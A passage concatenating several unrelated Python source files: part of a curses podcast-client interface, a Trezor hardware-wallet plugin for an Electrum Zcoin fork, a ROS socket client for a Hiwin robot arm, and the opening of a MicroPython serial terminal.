if footer_str != "":
footer_str += " -- Press %s for help" % Config["key_help"]
self._footer_window.attron(curses.A_BOLD)
self._footer_window.addstr(
1, 0, " " * (self._footer_window.getmaxyx()[1] - 1)
)
footer_str = footer_str[:self._footer_window.getmaxyx()[1] - 1]
self._footer_window.addstr(1, 0, footer_str)
# add window borders
self._header_window.hline(1, 0,
0, self._header_window.getmaxyx()[1])
self._footer_window.hline(0, 0,
0, self._footer_window.getmaxyx()[1])
# update display for current perspective
self._perspectives[self._active_perspective].display()
def _get_active_perspective(self) -> Perspective:
"""Retrieve the active/visible Perspective.
"""
return self._perspectives[self._active_perspective]
def _change_active_perspective(self, perspective_id) -> None:
"""Changes _active_perspective to the given perspective.
Args:
perspective_id: the ID of the perspective to change to
"""
assert perspective_id in self._perspectives
self._active_perspective = perspective_id
self._perspectives[perspective_id].made_active()
self.clear()
def _get_input_str(self, prompt) -> str:
"""Prompts the user for input and returns the resulting string.
This method assumes that all input strings will be obtained in the
footer window.
Args:
prompt: a string to inform the user of what they need to enter
Returns:
str: the user's input
"""
assert self._footer_window is not None
assert isinstance(prompt, str)
curses.curs_set(1)
self._stdscr.timeout(-1) # disable timeouts while waiting for entry
# display input prompt
self._footer_window.addstr(
1, 0, " " * (self._footer_window.getmaxyx()[1] - 1)
)
self._footer_window.addstr(1, 0, prompt)
entry_pad = curses.newpad(1, 999)
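# the pad is much wider than the footer so input longer than the visible width can scroll horizontally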
current_x = 0
scroll_x = 0
input_char = None
while input_char not in [curses.KEY_ENTER, 10]:
if input_char is not None:
# manually handle backspace
if input_char in [curses.KEY_BACKSPACE, 127]:
if current_x > 0:
entry_pad.delch(0, current_x - 1)
current_x -= 1
if scroll_x > 0:
scroll_x -= 1
else:
# scroll the input pad if necessary
if current_x + len(prompt) > \
self._footer_window.getmaxyx()[1] - 1:
scroll_x += 1
# add the entered character to the pad
entry_pad.addch(0, current_x, input_char)
current_x += 1
# display current portion of pad
entry_pad.refresh(0, scroll_x,
self._parent_y - 1, len(prompt),
self._parent_y - 1,
self._footer_window.getmaxyx()[1] - 1)
# get the next input character
input_char = self._footer_window.getch()
self._stdscr.timeout(self.INPUT_TIMEOUT)
self._footer_window.clear()
curses.curs_set(0)
return entry_pad.instr(0, 0, entry_pad.getmaxyx()[1]) \
.decode('utf-8').strip()
def _get_y_n(self, prompt) -> bool:
"""Prompts the user for a yes or no (y/n) input.
Args:
prompt: a string to inform the user of what they need to enter
Returns:
bool: true if the user presses y, false otherwise
"""
assert self._footer_window is not None
assert isinstance(prompt, str)
curses.echo()
curses.curs_set(1)
self._footer_window.addstr(
1, 0, " " * (self._footer_window.getmaxyx()[1] - 1)
)
self._footer_window.addstr(1, 0, prompt)
char = self._footer_window.getch()
self._footer_window.clear()
curses.curs_set(0)
curses.noecho()
return char == ord('y')
def handle_input(self, c) -> bool:
"""Performs action corresponding to the user's input.
Args:
c: the input character
Returns:
bool: whether or not the application should continue running
"""
for perspective_id in self._perspectives:
if c == self.KEY_MAPPING[str(perspective_id)]:
self._change_active_perspective(perspective_id)
return self._get_active_perspective().handle_input(c)
def add_feed(self) -> None:
"""Prompt the user for a feed and add it, if possible.
"""
path = self._get_input_str("Enter the URL or path of the feed: ")
try:
# assume urls have http in them
if "http" in path:
feed = Feed(url=path)
else:
feed = Feed(file=path)
if feed.validated:
self.database.replace_feed(feed)
self.database.replace_episodes(feed, feed.parse_episodes())
self.menus_valid = False
self.change_status("Feed '%s\' successfully added" % str(feed))
except FeedError as e:
if isinstance(e, FeedLoadError):
self.change_status(
"FeedLoadError: %s" % str(e)
)
elif isinstance(e, FeedDownloadError):
self.change_status(
"FeedDownloadError: %s" % str(e)
)
elif isinstance(e, FeedParseError):
self.change_status(
"FeedParseError: %s" % str(e)
)
elif isinstance(e, FeedStructureError):
self.change_status(
"FeedStructureError: %s" % str(e)
)
else:
self.change_status(
"FeedError [ambiguous]: %s" % str(e)
)
def delete_feed(self, feed: Feed) -> None:
"""Deletes the given feed from the database.
If the delete_feed_confirmation config option is true, this method will
first ask for y/n confirmation before deleting the feed.
Deleting a feed also deletes all downloaded/saved episodes.
Args:
feed: the Feed to delete, which can be None
"""
if feed is not None:
should_delete = True
if helpers.is_true(Config["delete_feed_confirmation"]):
should_delete = self._get_y_n(
"Are you sure you want to delete this feed? (y/n): "
)
if should_delete:
self.database.delete_feed(feed)
self.menus_valid = False
self.change_status("Feed successfully deleted")
def reload_feeds(self) -> None:
"""Reloads the users' feeds.
If the total number of feeds is >= the reload_feeds_threshold config
option, this method will first ask for y/n confirmation.
This method starts the reloading in a new un-managed thread.
"""
should_reload = True
if len(self.database.feeds()) >= int(Config["reload_feeds_threshold"]):
should_reload = self._get_y_n(
"Are you sure you want to reload all of your feeds?"
" (y/n): "
)
if should_reload:
t = threading.Thread(target=self.database.reload, args=[self])
t.start()
def save_episodes(self, feed=None, episode=None) -> None:
"""Save a feed or episode.
If the user is saving an episode and the episode is already saved, this
method will instead ask the user if they would like to delete the
downloaded episode. However, if the user is saving a feed, there is no
prompt to delete episodes, even if some are downloaded. In this case,
downloaded episodes are simply skipped.
Exactly one of either feed or episode must be given.
Args:
feed: (optional) a feed to download all episodes of
episode: (optional) an episode to download or delete
"""
assert (feed is None or episode is None) and (feed is not episode)
if feed is not None:
for episode in self.database.episodes(feed):
if not episode.downloaded:
self._download_queue.add(episode)
else:
if episode.downloaded:
should_delete = self._get_y_n(
"Are you sure you want to delete the downloaded"
" episode? (y/n): ")
if should_delete:
episode.delete(self)
else:
self._download_queue.add(episode)
def clear(self) -> None:
"""Clear the screen.
"""
self._stdscr.clear()
def refresh(self) -> None:
"""Refresh the screen and all windows in all perspectives.
"""
self._stdscr.refresh()
for perspective_id in self._perspectives:
self._perspectives[perspective_id].refresh()
self._header_window.refresh()
self._footer_window.refresh()
def terminate(self) -> None:
"""Set console settings to their normal state.
This method does not, by itself, cause the application to exit. Nor
does it even cause the input loop to end. It should simply be seen as
a "wrapping up" method for any actions which need to be performed
before the object is destroyed.
"""
self._queue.stop()
curses.nocbreak()
self._stdscr.keypad(False)
curses.echo()
curses.endwin()
def update_parent_dimensions(self) -> None:
"""Update _parent_x and _parent_y to the size of the console.
"""
current_y, current_x = self._stdscr.getmaxyx()
if current_y != self._parent_y or current_x != self._parent_x:
self._parent_y, self._parent_x = current_y, current_x
self._create_windows()
self.menus_valid = False
self.refresh()
if self._parent_y < self.MIN_HEIGHT:
raise DisplaySizeError("Display height is too small")
if self._parent_x < self.MIN_WIDTH:
raise DisplaySizeError("Display width is too small")
def getch(self) -> int:
"""Gets an input character from the user.
This method returns after at most INPUT_TIMEOUT ms.
Returns:
int: the character entered by the user, or -1
"""
char = self._stdscr.getch()
return char
def change_status(self, status) -> None:
"""Changes the status message displayed in the footer.
Args:
status: the status message to display
"""
assert isinstance(status, str)
self._status = status
self._status_timer = self.STATUS_TIMEOUT
def update(self) -> None:
"""Updates all actively tracked components of this object.
Should be called by the main loop after every input or input timeout.
"""
# have the queue check if it needs to go to the next player
self._queue.update()
# check the status of any downloads
try:
self._download_queue.update()
except OSError as e:
self.change_status("OSError: %s" % str(e))
return
# update the status timer
# If the user is not doing anything, the status message will take
# INPUT_TIMEOUT * STATUS_TIMEOUT ms to be cleared. However, if the user
# is performing inputs (i.e. traversing a menu) the message may be
# cleared much quicker, since it will go away in STATUS_TIMEOUT
# keypresses. However, this seems reasonable, since if the user is
# actively controlling the client and not pausing to read the message,
# they probably don't care about it anyway.
if self._status_timer > 0:
self._status_timer -= 1
if self._status_timer <= 0:
# status_timer should be reset during the next change_status()
self._status = ""
# write any episode modifications to the database
if len(self._modified_episodes) > 0:
for episode in self._modified_episodes:
self.database.replace_episode(episode._feed, episode)
self.menus_valid = False
self._modified_episodes = []
@property
def parent_x(self) -> int:
"""int: the width of the parent screen, in characters"""
return self._parent_x
@property
def parent_y(self) -> int:
"""int: the height of the parent screen, in characters"""
return self._parent_y
@property
def database(self) -> Database:
"""Database: the user's database"""
return self._database
@property
def perspectives(self) -> dict:
"""dict: the loaded Perspective's with id:perspective pairs"""
return self._perspectives
@property
def queue(self) -> Queue:
"""Queue: the Queue of Player's"""
return self._queue
@property
def menus_valid(self) -> bool:
"""bool: whether the menu contents are valid (!need_to_be_updated)"""
return self._menus_valid
@menus_valid.setter
def menus_valid(self, menus_valid) -> None:
self._menus_valid = menus_valid
@property
def modified_episodes(self) -> List[Episode]:
"""List[Episode]: database episodes to save on the next update"""
return self._modified_episodes
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from electrum_xzc.util import bfh, bh2u
from electrum_xzc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from electrum_xzc.i18n import _
from electrum_xzc.plugins import BasePlugin
from electrum_xzc.transaction import deserialize
from electrum_xzc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
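# get_script_gen() below infers the script type from the keystore derivation path:
# m/49'/... -> P2SH-SegWit, m/84'/... -> native SegWit, anything else -> legacy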
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_script_gen(self):
def is_p2sh_segwit():
return self.derivation.startswith("m/49'/")
def is_native_segwit():
return self.derivation.startswith("m/84'/")
if is_native_segwit():
return SCRIPT_GEN_NATIVE_SEGWIT
elif is_p2sh_segwit():
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
try:
return self.hid_transport(device)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never return if a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Zcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the initialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_gen = wallet.keystore.get_script_gen()
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
Hiwin_RT605_ArmCommand_Socket_20190627175408.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multi-threading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' # initial value of the data to transmit
Arm_feedback = 1 # assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # PEP 479: raising StopIteration inside a generator is a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ## create the server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
##---------------socket transmission of arm commands-----------------
def Socket_command():
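# dispatch the pending arm command to the controller over the TCP socket, according to socket_cmd.action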
global Socket,arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------set arm fast/safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ## switch back to the initial mode state
#print(data)
Socket.send(data.encode('utf-8')) # send the command string over the socket, encoded as UTF-8
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
# arm side reports the arm state
if str(feedback_str[2]) == '48':# 'F': arm is Ready, able to accept the next motion command
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# 'T': arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# '6': strategy finished
state_feedback.ArmState = 6
print("shutdown")
# confirm the sent flag
if str(feedback_str[4]) == '48':# returned 0: false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':# returned 1: true
state_feedback.SentFlag = 1
##---------------socket transmission of arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## multi-threading
def thread_test():
socket_client()
## multi-threading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## set the initial mode state
t = threading.Thread(target=thread_test)
t.start() # start the worker thread
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
MPyTerm.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import tty
import termios
import time
import argparse
import binascii
import re
import shutil
from threading import Thread
from datetime import datetime
try:
import serial
except ImportError:
print("PySerial must be installed, run `pip3 install pyserial`\r\n")
sys.exit(1)
KEY_NONE = 0x00
KEY_LEFT = 0x1f
KEY_RIGHT = 0x1e
KEY_HOME = 0x10
KEY_END = 0x03
KEY_QUIT = 0x11
KEY_ENTER = 0x0a
KEY_BACKSPACE = 0x08
KEY_DELETE = 0x7f
KEY_TAB = 0x09
KEY_DUP = 0x04
#============
class PyTerm:
KEYMAP = { ## Gets lengthy
"\x1b[D" : KEY_LEFT,
"\x1b[C" : KEY_RIGHT,
"\x1b[H" : KEY_HOME, ## in Linux Terminal
"\x1bOH" : KEY_HOME, ## Picocom, Minicom
"\x1b[1~": KEY_HOME, ## Putty
"\x1b[F" : KEY_END, ## Linux Terminal
"\x1bOF" : KEY_END, ## Picocom, Minicom
"\x1b[4~": KEY_END, ## Putty
"\x03" : KEY_DUP, ## Ctrl-C
"\r" : KEY_ENTER,
"\x7f" : KEY_BACKSPACE, ## Ctrl-? (127)
"\x1b[3~": KEY_DELETE,
"\x11" : KEY_QUIT, ## Ctrl-Q
"\x1bq" : KEY_QUIT, ## Alt-Q
"\n" : KEY_ENTER,
"\x04" : KEY_DUP, ## Ctrl-D
"\x09" : KEY_TAB,
}
#----------------------------------------------------------------------------
def __init__(self, baudrate=115200, device='/dev/ttyUSB0', rst=0, clr=False):
self.DEVICE = device
